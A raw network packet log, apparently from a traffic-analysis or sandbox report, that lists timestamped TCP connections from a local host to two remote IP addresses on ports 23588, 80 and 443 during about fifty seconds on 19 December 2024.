                                                                                                                                          Dec 19, 2024 15:35:56.396529913 CET2358858045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:56.396656036 CET5804523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:56.396898985 CET5804380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:56.403100014 CET5804523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:56.405275106 CET2358857965107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:56.516369104 CET8058043116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:56.522819996 CET2358858045107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:58.175431013 CET8058043116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:58.175529003 CET5804380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:58.202239990 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:58.202310085 CET44359311116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:58.202472925 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:58.203306913 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:58.203344107 CET44359311116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.038125992 CET44359311116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.038269043 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:00.038940907 CET44359311116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.039005041 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:00.173327923 CET5804523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.173372030 CET5796523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.173996925 CET6031923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.294044018 CET2358860319107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.294240952 CET6031923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.296431065 CET6031923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.301978111 CET6034523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.416251898 CET2358860319107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.421972990 CET2358860345107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:00.422090054 CET6034523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.428411007 CET6034523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:00.548156977 CET2358860345107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:01.514590025 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.514700890 CET44359311116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:01.514808893 CET59311443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.642405033 CET5804380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.643129110 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.762511969 CET8058043116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:01.762772083 CET8061064116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:01.762859106 CET5804380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.763215065 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.765031099 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:01.884553909 CET8061064116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:03.559776068 CET8061064116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:03.560200930 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:03.567137957 CET62148443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:03.567187071 CET44362148116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:03.571233988 CET62148443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:03.572164059 CET62148443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:03.572192907 CET44362148116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.297888041 CET6031923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.297914028 CET62148443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.297916889 CET6034523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.302012920 CET6272923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.421550035 CET2358862729107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.423831940 CET6272923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.431344986 CET6272923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.434205055 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.434211016 CET6282380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.435555935 CET6282523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.553057909 CET2358862729107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.556922913 CET8062823116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.556936026 CET8061064116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.556998968 CET6282380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.557027102 CET6106480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.557542086 CET2358862825107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.557610989 CET6282523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.557611942 CET6282380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:04.558063984 CET6282523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:04.679348946 CET8062823116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:04.679506063 CET2358862825107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.443718910 CET6282380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:08.443783998 CET6282523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.443811893 CET6272923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.444664955 CET4917723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.564882040 CET2358849177107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.564965963 CET4917723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.567744970 CET4917723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.575658083 CET4918823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.580957890 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:08.687309027 CET2358849177107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.695533037 CET2358849188107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.695626974 CET4918823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.696515083 CET4918823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:08.700591087 CET8049190116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.700664997 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:08.701653957 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:08.816450119 CET2358849188107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:08.821238041 CET8049190116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:11.078775883 CET8049190116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:11.079165936 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:11.082441092 CET50769443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:11.082480907 CET44350769116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:11.082660913 CET50769443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:11.083834887 CET50769443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:11.083847046 CET44350769116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.579716921 CET4917723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.579718113 CET4918823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.579781055 CET50769443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.580739975 CET5134023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.697007895 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.697453976 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.697669983 CET5141823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.700686932 CET2358851340107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.700761080 CET5134023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.701181889 CET5134023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.972760916 CET8051417116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.972826958 CET8049190116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.972860098 CET2358851418107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.972891092 CET2358851340107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:12.972884893 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.972924948 CET4919080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.972954988 CET5141823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:12.983561039 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:12.983938932 CET5141823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:13.103691101 CET8051417116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:13.104260921 CET2358851418107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:14.681391954 CET8051417116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:14.682367086 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:14.874464989 CET52053443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:14.874516964 CET44352053116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:14.874579906 CET52053443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:14.875824928 CET52053443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:14.875838995 CET44352053116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.595175028 CET5134023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.595335007 CET52053443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.595345020 CET5141823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.596265078 CET5288923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.711635113 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.711970091 CET5299480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.715218067 CET5299323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.715936899 CET2358852889107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.716034889 CET5288923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.716223955 CET5288923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.832670927 CET8052994116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.832766056 CET5299480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.833144903 CET8051417116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.833394051 CET5141780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.835917950 CET2358852993107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.836052895 CET5299323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.837280035 CET2358852889107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.839204073 CET5299480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:16.839675903 CET5299323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:16.958904982 CET8052994116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:16.959160089 CET2358852993107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.614466906 CET5299480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:20.614490032 CET5299323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.614528894 CET5288923588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.616466045 CET5556723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.732594967 CET5560223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.736165047 CET2358855567107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.736254930 CET5556723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.740609884 CET5560480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:20.741781950 CET5556723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.852438927 CET2358855602107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.852549076 CET5560223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.852978945 CET5560223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:20.860238075 CET8055604116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.860352993 CET5560480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:20.860780954 CET5560480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:20.861360073 CET2358855567107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.972511053 CET2358855602107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:20.980242968 CET8055604116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.626516104 CET5556723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.626566887 CET5560223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.626595020 CET5560480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:24.627439976 CET5779423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.746141911 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:24.748398066 CET2358857794107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.748773098 CET5790323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.748837948 CET5779423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.749413013 CET5779423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.865742922 CET8057901116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.865849018 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:24.866692066 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:24.868402004 CET2358857903107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.868505955 CET5790323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.868876934 CET2358857794107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.869019985 CET5790323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:24.986264944 CET8057901116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:24.988513947 CET2358857903107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:26.715501070 CET8057901116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:26.715574980 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:26.740834951 CET59065443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:26.740948915 CET44359065116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:26.741024971 CET59065443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:26.742109060 CET59065443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:26.742146969 CET44359065116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.642235041 CET5779423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.642268896 CET5790323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.642296076 CET59065443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.642868996 CET6025423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.758487940 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.759953976 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.760240078 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.762727022 CET2358860254107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.762890100 CET6025423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.763494015 CET6025423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.878726959 CET2358860361107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.879009962 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.879760981 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.879812956 CET8057901116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.879837990 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.879859924 CET5790180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:28.883018017 CET2358860254107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:28.893871069 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:28.893976927 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:29.014086008 CET2358860361107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:29.014234066 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.696933985 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.697074890 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.702667952 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.702792883 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:30.702891111 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.703542948 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:30.703583956 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.537683964 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.537817955 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:32.538503885 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.538578033 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:32.676772118 CET6036123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.676810980 CET6025423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.688107967 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.807842970 CET2358862635107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.807919979 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.816405058 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.828305006 CET6266723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.936444998 CET2358862635107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.948012114 CET2358862667107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:32.948215008 CET6266723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:32.954329014 CET6266723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:33.073959112 CET2358862667107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:34.422697067 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.422806978 CET44361403116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:34.422904968 CET61403443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.611198902 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.611530066 CET6342280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.731652021 CET8063422116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:34.731729984 CET6342280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.732237101 CET8060362116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:34.732419968 CET6036280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.732695103 CET6342280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:34.852158070 CET8063422116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.083749056 CET6263523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.083794117 CET6266723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.083800077 CET6342280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:36.196530104 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:36.197942972 CET6431123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.202577114 CET6431323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.317475080 CET8064310116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.317508936 CET2358864311107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.317594051 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:36.317686081 CET6431123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.318475008 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:36.318864107 CET6431123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.323188066 CET2358864313107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.323268890 CET6431323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.323465109 CET6431323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:36.442864895 CET8064310116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.442878962 CET2358864311107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:36.446234941 CET2358864313107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:38.041745901 CET8064310116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:38.041831970 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:38.045327902 CET65484443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:38.045391083 CET44365484116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:38.045516014 CET65484443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:38.046004057 CET65484443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:38.046013117 CET44365484116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.204174995 CET6431123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.204221010 CET6431323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.204245090 CET65484443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.205455065 CET5029023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.319259882 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.319689989 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.321093082 CET5040823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.325160980 CET2358850290107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.325227022 CET5029023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.332423925 CET5029023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.439348936 CET8050407116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.439379930 CET8064310116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.439475060 CET6431080192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.439486027 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.440642118 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:40.443380117 CET2358850408107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.443654060 CET5040823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.443932056 CET5040823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:40.452794075 CET2358850290107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.560535908 CET8050407116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:40.563802004 CET2358850408107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:42.322608948 CET8050407116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:42.322679043 CET5040780192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:42.325488091 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:42.325552940 CET44351650116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:42.325700998 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:42.326960087 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:42.326978922 CET44351650116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.151889086 CET44351650116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.152009964 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:44.152679920 CET44351650116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:36:44.153736115 CET51650443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:36:44.220150948 CET5040823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.220249891 CET5029023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.220869064 CET5283223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.408857107 CET5287823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:36:44.487613916 CET2358852832107.160.131.254192.168.2.5
